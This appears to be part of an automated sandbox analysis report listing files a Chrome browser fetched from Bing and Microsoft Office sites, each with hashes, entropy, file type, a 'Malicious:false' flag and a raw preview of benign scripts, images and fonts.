                                                                                                    SSDEEP:24:7JVCEan7NLRWm8tRWv6lOnRWtFjDPTDRRKXtwBUSbMh0ZkPBoGBYwIlRW3PwTeJF:ANLwHtwWOnwtNjTDGXt0UqMKZYoGBYfc
                                                                                                    MD5:45345F7E8380393CA0C539AE4CFE32BD
                                                                                                    SHA1:292D5F4B184B3FF7178489C01249F37F5CA395A7
                                                                                                    SHA-256:3A40A1FF034448D68D92A75ABABA09BA5F2B71D130F5F6BDF160DCF8851529A9
                                                                                                    SHA-512:2BFD00BF303AD5A1E8413B5EE6A162167605511FEFB8DF61A8F40F80382F5520DF690A53B1058365F1D81562B2668376886D0F829517A642FCD87412801FE987
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/KS1fSxhLP_cXhInAEknzf1yjlac.js
                                                                                                    Preview:function addRemoveListenersOnAll(){var t=_ge("b_content"),n,i,r;t&&(n=_d.createElement("STYLE"),n.id=styleIdString,n.innerText="#b_results h2>a {padding: 16px 40px 0 6px;margin: -16px -40px 0 -6px;}",_d.head&&_d.head.appendChild(n),i=t.getElementsByClassName("b_ad"),i&&AddRemoveListener(i),r=t.getElementsByClassName("b_algo"),r&&AddRemoveListener(r))}function AddRemoveListener(n){for(var t,i,u=n.length,r=0;r<u;r++)if(t=n[r].getElementsByTagName("CITE"),t&&t.length>0)for(i=0;i<t.length;i++)sj_be(t[i],"click",algo_c)}function mouseMoveAfterTouchHandler(){sj_ue(document,"mousemove",mouseMoveAfterTouchHandler);var n=_d.getElementById(styleIdString);n&&n.parentNode&&n.parentNode.removeChild(n);sj_log("CI.TTC","mouse","started");sj_ue(document,"mousemove",mouseMoveAfterTouchHandler)}function touchStartHandlerAll(n){n.pointerType==="touch"&&(addRemoveListenersOnAll(),sj_log("CI.TTC","touch","started"),sj_ue(document,"pointerdown",touchStartHandlerAll),document.addEventListener("mousemove",mou
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1391
                                                                                                    Entropy (8bit):4.796412914000846
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:t4LxSdeBU4dxCey0fA53J/S/7/sG5BmefEqrR5GTGOby2NF2E/:+xSUBU4S55Z/aB5BmefEqrRYK6
                                                                                                    MD5:620580657E8A45B4A7B8450B8DA5CD32
                                                                                                    SHA1:922187F6E9192BA43886FB43B70C15735CAFB9E8
                                                                                                    SHA-256:91DE3100632E986CDB6897793EF1B2A8655B15ED4145098CA489856C043D207E
                                                                                                    SHA-512:F3CE71CD92BA2C6ABD6CDEE48F677522439CAD023042D56728E5CB2DED5EC51D1170308FB1524C4A352AC6C5E4E514147D21B99667CCE54CE35A73D91DD27E4B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/kiGH9ukZK6Q4hvtDtwwVc1yvueg.svg
                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 40 40" width="64" height="64">.. <style type="text/css">.. .anim {.. animation-name: blink;.. animation-duration: 1s;.. animation-iteration-count: infinite;.. fill: #05E9F5;.. transition-timing-function: linear;.. }.. @keyframes blink {.. 0% {.. opacity: 0.. }.. 50% {.. opacity: 1.. }.. 75% {.. opacity: 1.. }.. 100% {.. opacity: 1.. }.. }.. .delay1 {.. animation-delay: 0s;.. }.. .delay2 {.. animation-delay: .125s;.. }.. .delay3 {.. animation-delay: .25s;.. }.. .delay4 {.. animation-delay: .375s;.. }.. .delay5 {.. animation-delay: .5s;.. }.. .delay6 {.. animation-delay: .675s;.. }.. .delay7 {.. animation-delay: .75s;.. }.. .delay8 {.. animation-delay: .875s;.. }.. </style>.. <circle class="delay1 anim" cx="20" cy="8" r="3" />.. <circle class="delay5 anim"
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (65394)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):91802
                                                                                                    Entropy (8bit):5.3603423050848615
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:C4F18VDgLMcb+0XbPN1xlJGFqCN3tcULcUoHfe:C4F18VDgLN9LN1mTn
                                                                                                    MD5:CF5CC7F4B57526CC37893DCB83DED031
                                                                                                    SHA1:E953783BE0A7894585778455AAE3D0DF094D6F29
                                                                                                    SHA-256:3A790B6C0D26D7A4D292CB27F992EAFAFF42C37E9318B2AB704207039127FCB8
                                                                                                    SHA-512:2320F9D7811CD773C1E5C2E95A31B39E9FF62A2FA7CA431975873DAB57AE42A75BA720D15AEB47FA2EA127D0766EB5AA15040CFFD04BF7A8CB8BCD7236069C40
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:/*!. * 1DS JS SDK Shared Analytics, 3.2.18. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,n){var t,r={},i="__ms$mod__",o={},a=o.esm_ms_shared_analytics_mectrl_3_2_18={},u="3.2.18",c="oneDsMeControl3",s=(s=e)[c]=s[c]||{},l=(l=e)[c="oneDsMeControl"]=l[c]||{},e=s[i]=s[i]||{},f=e.v=e.v||[],c=l[i]=l[i]||{},d=c.v=c.v||[];for(t in(c.o=c.o||[]).push(o),n(r),r)s[t]=r[t],f[t]=u,l[t]=r[t],d[t]=u,(a.n=a.n||[]).push(t)}(this,function(e){"use strict";!function(e,n,t){var r=Object.defineProperty;if(r)try{return r(e,n,t)}catch(i){}typeof t.value!==undefined&&(e[n]=t.value)}(e,"__esModule",{value:!0});var y="function",m="object",se="undefined",C="prototype",I="hasOwnProperty",b=Object,S=b[C],x=b.assign,w=b.create,n=b.defineProperty,_=S[I],T=null;function O(e){e=!1===(e=void 0===e||e)?null:T;return e||((e=(e=(e=typeof globalThis!==se?globalThis:e)||typeof self===se?e:self)||typeof window===se?e:window)||typeof global===se||(e=global),T=e),e
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1937), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1937
                                                                                                    Entropy (8bit):5.461252594947073
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:qYe3k+th+DNfxe2K9vdjmM0QVV9yTRKcDi4:hskXDuf9FmM0AP0LJ
                                                                                                    MD5:BA408C0E6B5F707319A057CF7CE3B4A7
                                                                                                    SHA1:BE42A50E853218E2F83DE38ACC3640C59225CFAF
                                                                                                    SHA-256:E64BDB46CBCAB956F480728DC1DC3AFB17C2C37F20886721246C101F24C3E03F
                                                                                                    SHA-512:6E64BD4A0F7E21C3551183960D88536D0613E617EE186AB52A2E679FA702B08230BBD2CB292A5602D13407DA7280A362FB46FCB15A40F3F77DE55BAE1C41754C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var WV=WV||{};(function(n){function u(){if("webVitals"in _w&&(!("isInit"in n)||!n.isInit)&&typeof sj_evt!="undefined"&&typeof sj_be!="undefined"){var t=_w.webVitals;n.onFCP=i(t.onFCP);n.onLCP=i(t.onLCP);n.onCLS=i(t.onCLS);n.onINP=i(t.onINP);n.metrics={};n.isMetricsFrozen=!1;n.isLogged=!1;sj_evt.bind("onP1",f,!0);sj_evt.bind("ajax.requestSent",h)}}function f(){if(!n.isInit){n.onFCP(e);n.onLCP(t);n.onCLS(t);n.onINP(t);n.isInit=!0}}function e(i){n.isFCPCalledOnce||(n.isFCPCalledOnce=!0,sb_st(function(){sj_be(_d,"visibilitychange",o);sj_be(_w,"pagehide",s)},0),t(i))}function o(){"visibilityState"in _d&&_d.visibilityState==="hidden"&&r()}function s(){r()}function h(){r();l()}function c(){n.isLogged=!1;n.metrics={}}function t(t){var i;switch(t.name){case"FCP":i=parseInt(t.value);break;case"LCP":i=parseInt(t.value);break;case"INP":i=parseInt(t.value);break;case"CLS":i=parseFloat(t.value).toFixed(4)}i&&n.metrics[t.name]!=i&&(n.metrics[t.name]=i,n.isLogged=!1)}function r(){!n.isLogged&&!n.isMet
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):4286
                                                                                                    Entropy (8bit):1.4428178104858655
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:sfyl+rblmboWbol4bolnbsoItwqol0roooooosEol07ooooooooooolxo/lmyosh:suE9gwXZBQ4Nxbk7/GrQV/z1nfx
                                                                                                    MD5:30967B1B52CB6DF18A8AF8FCC04F83C9
                                                                                                    SHA1:AAF67CD84FCD64FB2D8974D7135D6F1E4FC03588
                                                                                                    SHA-256:439B6089E45EF1E0C37EF88764D5C99A3B2752609C4E2AF3376480D7FFCFAF2E
                                                                                                    SHA-512:7CB3C09A81FBD301741E7CF5296C406BAF1C76685D354C54457C87F6471867390A1AEED9F95701EB9361D7DFACCE31AFD1D240841037FC1DE4A120C66C1B088C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.bing.com/sa/simg/favicon-trans-bg-blue-mg.ico
                                                                                                    Preview:...... .... .........(... ...@..... .........%...%........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n...n...n....................................................................
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1094 x 761, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):489526
                                                                                                    Entropy (8bit):7.995720041871589
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:6144:aKimPYeigxfUPOwwMSavIHHukSrlKdZmzrC41zbxJa9ZqHqqzM0pZAyeRLqtt3LP:aKPFyOziIHOEgz2izjDANRLsl+4H7
                                                                                                    MD5:708BCC570AD4887E2C1854014B472FC0
                                                                                                    SHA1:768539D7A0EF0061097FF3AE0895EE437D543A13
                                                                                                    SHA-256:88A8CE64B7B33A367FC73338F5E319B3546DD782E0336CCA07D00A54B5C51DA0
                                                                                                    SHA-512:9E35EBDE9BBC942B2F1ECDD7A700D2822B651EC1682B27BB14936A683A5E7288D6F151B3299B2D423B2A2526516519991B7F967F1A466936E91EDAB4CAC13F8B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-commercial-4-mreb-708bcc570a.png
                                                                                                    Preview:.PNG........IHDR...F...........!.....pHYs.........&.:4....sRGB.........gAMA......a...w.IDATx.....$.Y.....O....l..]..*.d...d...X`0.^....{...\s...K...m0..m0`2.e..]m........t.t..}...{...l.vv..nMwW..>U.....=..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 80x80, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):980
                                                                                                    Entropy (8bit):7.161791713771241
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ZptTpn7mQyFJI6q6yj0fYxI6R/zvRb3ZsGm+N:ZptVi3jNYofYSkt39m+N
                                                                                                    MD5:17C5569654A0A14906AC404C109B3E30
                                                                                                    SHA1:EB6A9093E2A0B0BD65682B7226EA6E4933F016A2
                                                                                                    SHA-256:AF8A2CBA0109ABA054F723ECDDEC97FCA8012B43D5831A5E61355AB0B1E39126
                                                                                                    SHA-512:B2C125331B65165A328CC705CCC7BC9C4FD79A440BAF214DDB19A667ABA97DDF160D6D939CD05389E06EFAA418C3AE63261046A70356A0A8EE906277C6BB1C4A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=OIP.ruRBRqlSyL_3BhiHULJX6AHaDI&w=80&h=80&c=1&vt=10&bgcl=121171&r=0&o=6&pid=5.1
                                                                                                    Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............P.P..".......................................................RbM....*.Y\).p..Pu.w]w..1R.......>|_...}YNB.ex..........................................H.. .b..+.5..S_O................................!1..."#AQaq..@Bd...........?..{|..rNX,...y3...A..>S.gq.......g.>.x...;.....%..?.9;"Sfw........j...Z...o.5...H...H.....6..........b..Yv...ZNOS..`83..l..{..m..F..S...:i..'..Ry1......LGl......*..#*.....6....B.q..@+.....&_..=...!.V.Fl.p.#.LP .BN;...Oi.......2 ...3.ffj.m=.}.9.{..r.i.t.......^..il.#..k...`|D......K...}...mb#Y....._...q.N.p....9.R>.o....N.4.....$...i}U.zc.].../.t.......>@..A.......?...!.......................1!. "AQ.........?.....b.1Cf.1J7d.b....S.K....*..C...~.B1....7....V..B..S.C.n....'..."........................!"A. 1Q.........?......n._.dyI$bE..R...$....$.......E.....
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (3390), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):3390
                                                                                                    Entropy (8bit):5.369380472284444
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:JQcrkTDZV7e2maeaa5/m4ynBbiMkA03RQqsh+4BQYiGxJ:JvkPre2mXr/+nBbwkh7vxJ
                                                                                                    MD5:6DB01A1BC27DEFB51547AD281BC57772
                                                                                                    SHA1:A6D8101B037CEC5DABB80A1568329B58123281AA
                                                                                                    SHA-256:A6347B4C2628CEDFEB5757743849800BCCE481B54A8D351C2FC1F9B80D3D4C81
                                                                                                    SHA-512:E9788EA55EFCA965FEA742CA85DF982416CD7ABBD4439E19781C47235199B2DA5832F70393C1066117DB1FE3FB2A9B873E7F298D7F15E193E313ED4ED36AF868
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/ptgQGwN87F2ruAoVaDKbWBIygao.js
                                                                                                    Preview:var Bnp=Bnp||{};Bnp.Global=Bnp.Global||{};Bnp.Version="1";Bnp.Partner=Bnp.Partner||function(){function i(){return typeof DefaultTrustedTypesPolicy!="undefined"}function s(n){return i()&&DefaultTrustedTypesPolicy.getOpaqueHTML?DefaultTrustedTypesPolicy.getOpaqueHTML(n):n}function h(n){return i()&&DefaultTrustedTypesPolicy.getOpaqueScript?DefaultTrustedTypesPolicy.getOpaqueScript(n):n}function c(n){return i()&&DefaultTrustedTypesPolicy.getOpaqueScriptURL?DefaultTrustedTypesPolicy.getOpaqueScriptURL(n):n}function f(n){sj_evt.fire("onBnpRender",n)}function r(n){var i=i||{};if(typeof i.stringify=="function")return i.stringify(n);var o=typeof n,u=n&&n.constructor==Array,f=[],e,t;if(o!="object"||n==null)return o=="string"?'"'+n+'"':String(n);for(e in n)t=n[e],t&&t.constructor!=Function&&(u?f.push(r(t)):f.push('"'+e+'":'+r(t)));return(u?"[":"{")+String(f)+(u?"]":"}")}function l(n){for(var r=[],u=n.getElementsByTagName("script"),t,i;u.length;)t=u[0],i=sj_ce("script"),t.src?i.src=c(t.src):t.text
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 10544, version 1.0
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):10544
                                                                                                    Entropy (8bit):7.978818164372222
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:zdZObGyIhlCLlNHSmMalbqw/37PfF1pLNdEVSVJbb/3yw142gIn:RZO6yUUzHSmH1qwzXvxNSsLD3yMgI
                                                                                                    MD5:8E160632C48AD1E3D0E9F4334636086B
                                                                                                    SHA1:7BA2921499B2264DEE14F95801BFBCF416861D7C
                                                                                                    SHA-256:57FEBFBAD63B722A38BC668E67BC7C2DC02ECA221F26DB3A9303C1BD584A1A42
                                                                                                    SHA-512:943E0BAB3A26AA73AB7F45636DCE32F435BC6651D3FE9F94DC8EE37FF2291A191A9F9276603C3B760EB734388C2388F06A8331FADF85025CB92687D3E86D24DE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_light.woff2
                                                                                                    Preview:wOF2......)0......R ..(.........................?FFTM..&..... .`..z......T.:.....6.$.... ..^..e..D%......,...QI*8.aB'-...Kn..5..O.&..e....P.(#4.w7|........=*wD..........}.*k..1.8.._..^.Y.........m..h.;.2.....wx...}......>.}..AD.....H.R....=|....[..#..........5"b.h..X#v.RcV.awR.K..kul..9.jI"m..A .i.%....=.....o..W..75H...h8".........k{....?.i.H...Hvt.%.V..#.l).*...s...ly.-5...R.+-..7..[.....D..Z...l6...Yv.#....#.Ft...c.TJ.._..U{.WB..:..........E.D.....5.y......ED..d......!......d.ArR@...s:w....t........)....Kv.x*.h....7.-[a..2l.{:.<u.V...:.......[.F2...ZV.N.....j..W....T\Z....@....y.i.|.....p......] ,..`,.t....LDAB...hs#..w.( i..l.g......U.#@n..N.8.O`l.@r..X.......S.o.._`..1z..VVt.;U&B"&.|."'...4..rL.QV..5.1i.G..Y....A..N]...o..iH...D.[......!.p.9^...!...nu....2..D....`.Xc.%vNA.V.Y...B...-..pU.J..(.)...42b%.$.t..u.....J... {........)9y.E.].^..Y.C7..Y....U....`q.".W.n6......a...tjc........,...a..h..b...|Y..Ya.........m..../..hA.2.Z0.....U.4.....3A..-.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1059 x 736, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):421343
                                                                                                    Entropy (8bit):7.9930283068921435
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:CzhXKcW0EjM7MmgItOOh5SdW8fgmAGbvEG:Czh6tI7MmqA5OW8fgfGbvT
                                                                                                    MD5:5EEEC8E6F540AAC271BB6D8BD113115A
                                                                                                    SHA1:B3256E64A78DD1A5CF6173ED958F69BC09E7E885
                                                                                                    SHA-256:434138E6620D458BEC6FB1F53DF26AAF6F57B4FDBDF14ED2EA03EDDF642A156A
                                                                                                    SHA-512:6D464624DA20CCE660174494492E14593E3A6765C4D01C223F68C38999BC83EF70E8E1BFD374EAE33295927C1B6A28F69716BBDA20591B2C31AE39C8F4EF7A49
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-edu-2-mreb-5eeec8e6f5.png
                                                                                                    Preview:.PNG........IHDR...#................pHYs.........&.:4....sRGB.........gAMA......a...mtIDATx...[..q..w..y.o.=..Y3...[V..(.v.;R..m......cN....NU@q.....*.....*...@QI.(.!P.sp..%.$.f.....Y........D....Z..}.{x......>,.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z...$.E..}5....-Z.h.E..N.Z....h.F..^.I{...b.._._~}....}.^}...?.o...U>?|...W..w/|=..|..}...g......./...x.s......=..~..........g.Q<.....}...
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):2278
                                                                                                    Entropy (8bit):7.856767134100099
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:iDKXGoj9PKXto6lKBcIxT/hdMvM3zqNLyGqXKkBeDwRtR5c7upprdE3m:i8v9PKXmTBrMk3zqN4K4e05DppuW
                                                                                                    MD5:AF6A8C1315F461A7580BCDD0AE382928
                                                                                                    SHA1:D5C674FEEE0A2C29B1BE205F090BA91297825B79
                                                                                                    SHA-256:BAE9542A80849780EA4904578B980EE3B3D4845739E4A79ED069120FFB4704F5
                                                                                                    SHA-512:AD913D554E28AED786273064DD34D36DC8C4F0E036D3A1000F39A69C630039B677D346BDB7D0BB8A7489FA78DB42B0DB0F1324C8BC9D65D245596219947877A0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=ODLS.03844a1a-9cd9-494c-9005-5481eccd1dc5&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG..yP....ig.h.Ij26.4...i...).j..<......(......d.Y... ."...Y..AVY...&>.*....V-26m.3s..w..|.{.J..XA..(....I.\_..P.mX.kX.\O.;.O.....u..zf.%.Z..[;4|:....7r...)h.......1.?%Id.....i.....jz.;D5P.l..?..=.FX.x...$.A3i4NM..y..W.e.Y....S.~s...:R|cZ..@.4.. ....nhJ. .....4...Q.....K..t.\.Z.}..1.x.6(sB.. ........e`E..@.4/..........N.rs..0_.v....K.r....1.dI.2...'j.W..|..8v........g. ..B....B3...).`_..;s..B9v.....q.z..z&...t~.#.mD..=.h.^.....d.....%.M{..(..U/.h(........'...>.....sF..qp.&....U..5....../i.e.s.H..C......M...D.[?-A+....C.&..n...m.....O..g.._...M.[2.a.<x..c...UL.Ky.t...<..g..(..Y..C.I....%PV4...mF..a[....`...#.qT.b..._./..ip.g..=..]....I&..N.e..^S.&.3.@ ..2... J...=....f.P.k..[.Z`..'n...Y...F..oRx.......`^.#.g.E..Zy*..R...>T.;.x.}......v.C...[..P.......'.lwhX.=.s.F.L..<*.]....98.4.R......`......M....&.....dz...s.....C>K......6..;_.Q'a...?.7...b~..y^....Z9..s.7...@..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):209
                                                                                                    Entropy (8bit):6.257245349235395
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPl3xWrE9/gnbBE1d7snLQNylzkIgDhqo/1ir1216rTmVN80S+st2up:6v/lhPKwCnFGgQNyld+/ou6Hp0NsTp
                                                                                                    MD5:7D4555B1487EC50930C7567B2690BF10
                                                                                                    SHA1:544C4B9A47D0D12FD38FDC07900D32D31C0F600F
                                                                                                    SHA-256:50BBDF35A7DE6804B4E50971D7E3656D6C8100E4A03CF935F841D0AFD47D8371
                                                                                                    SHA-512:F293E1F06C7244C2FD080A65C3A32D134A6AF23E9148B8A391E242D8EA36297FFE8C500903B9B65A6E450EB1731ECF28CBE0A67F6E246938501BEBDDA5A6B177
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J....sIDATXG....0...7...#.}$.....N..bu...,.....>>.mm....8....K....@....NW..n......cL..7....0....\...v.k.. ......`x....GT..{....IEND.B`.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1729), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1729
                                                                                                    Entropy (8bit):5.072040637705228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:M9M4LYWcGoVf9zB4cdS2gIfNKoqbKPIkzrKnYAyo2jyjCKxFj81o0:2M4yG69LdSTjGbq4fufmm0
                                                                                                    MD5:A433650379BAB51BD0D50B7539E142EF
                                                                                                    SHA1:8BAAC1F4AEAFC088C227A17E5DD33939D38CC41A
                                                                                                    SHA-256:ECD739C27BD814DB96CBFB612C7854A224BAE21296AA0CFF7A5C66294CCFA203
                                                                                                    SHA-512:CCBE76C8CF0E116B12F268C003BAFC640C281D5B1EBD27BB66C21CC872E435A1395E82C061D4BD6970B6CA2E378D9BB16ACA5D932C69820D7030EBCC765E50FA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var NewsAccessibility;(function(){var a="0px",h="0px",et="b_hide",ot="itm_spt",st="2.24px",t="a11y",v="tca11y",y=_ge("b_content"),c=_qs(".na_t_news_caption"),o=_qs(".itm_spt_news_caption"),i=_qs(".ans_nws"),p=i?_qs(".na_cnt",i):null,w=p?_qs(".na_cl",p):null,b=w?_qs(".b_viewport",w):null,n=b?_qs(".b_slidebar",b):null,s=n?_qs(".nws_nor",n):null,k=i?_qs(".nart_content",i):null,d=k?_qs(".nart_cl",k):null,g=d?_qs(".b_viewport",d):null,r=g?_qs(".b_slidebar",g):null,l=i?_qs(".nws_cm",i):null,nt=l?_qs(".opinion_content",l):null,tt=nt?_qs(".b_viewport",nt):null,u=tt?_qs(".b_slidebar",tt):null,it=l?_qs(".tl_cl",l):null,rt=it?_qs(".b_viewport",it):null,f=rt?_qs(".b_slidebar",rt):null,ut=i?_qs(".new_see_more_container",i):null,ft=ut?_qs(".new_see_more",ut):null,e=ft?_qs(".new_see_more_txt",ft):null;y&&(n||f||r||u||e||o)&&setInterval(function(){var i;h=(i=_w.getComputedStyle(y))===null||i===void 0?void 0:i.wordSpacing;h!==a&&(a=h,h===st?(c&&(c.style.cssText="; max-height: 100px; -webkit-line-clamp:
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:53:43], progressive, precision 8, 160x160, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):4934
                                                                                                    Entropy (8bit):7.782095567670307
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:sHbZoNWsmjRgjXFQvdXNkuz4nicDWk+4Nf6Q2mKwADHfXC7OWn:sFmmjGjWddkuz4nicyktAtmtAbuLn
                                                                                                    MD5:FDA2CEAE0679611937E6E71F701A36AB
                                                                                                    SHA1:75B98D4B8E7142F0F57620296354F61C4C6F3A8F
                                                                                                    SHA-256:B818C1E9B0B46CCCDC158ACA581C3C5F4A9BD3DDA380DA03AF52F43F14F5651E
                                                                                                    SHA-512:904100EBE310AFDF86C2E4C9CBDDC118178D41B45D076BB6077DB8F3BCED8B3CEDF545CE079E39B6F8034C2247FD4C824C0522B6221E3CDC02423AF8EEB9F8A3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/dbmNS45xQvD1diApY1T2HExvOo8.jpg
                                                                                                    Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:53:43....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......................................................................................._..Z/9.....AhY...T0*!Eu,..dk.....y. .LP.B..V..m@@f....<uf.......h...)8.2j..*U...<.n....4.B.-....W..^.J..o.{.....z.....".s.,.S...;...^f<.O8,>u.s...n.)....\o..6.{.=#:(.F.;..;1].V.........U5.1..W..g7|r5..==...Hy..h....@...KV.{.l.9.........F.S....N{9.Y..(C.f..u\..&OX..-..N..w\..(.:.1..:ldGW.q.!...mo...e.=........a2..:hkA.....Z.:r}.....Z[...../\...-..A.#..E-K.5..k........]....yQhiAF........cy.[...C..qg.j.Y..Q3.Uh(..X.>kjs..5.....=.M.J.m.Q...FE.m=s..>.WSv..J..42+....V..[....n,.h..5...\.I]...%T.0k.=...h..5.td....].@.\..^.r....d.f..[....k....0*E.U..H.....G...]]Z.M.Y..-..I....%.......................
